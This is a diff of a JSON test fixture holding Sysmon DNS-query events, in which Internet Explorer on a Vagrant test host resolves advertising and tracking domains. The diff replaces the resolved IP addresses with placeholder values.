Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6896,7 +6896,7 @@ "ProcessId": "2736", "QueryName": "secure.adnxs.com", "QueryStatus": "0", - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;" + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;" }, "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", @@ -6913,7 +6913,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6939,7 +6939,7 @@ "event_data": { "QueryName": "tps.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.478", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6955,7 +6955,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6965,7 +6965,7 @@ "event_data": { "QueryName": "i.liadm.com", "QueryStatus": "0", - "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.536", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6998,7 +6998,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -7015,7 +7015,7 @@ "time_created": "2019-07-18T03:34:09.067Z", "level": "information", "event_data": { - "QueryResults": "::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.544", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7038,7 +7038,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7050,7 +7050,7 @@ "ProcessId": "2736", "QueryName": "router.infolinks.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", @@ -7094,7 +7094,7 @@ "ProcessId": "2736", "QueryName": "grey.erne.co", "QueryStatus": "0", - "QueryResults": "::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.552", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -7110,7 +7110,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7127,7 +7127,7 @@ "ProcessId": "2736", "QueryName": "sync.jivox.com", "QueryStatus": "0", - "QueryResults": "::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, @@ -7155,7 +7155,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 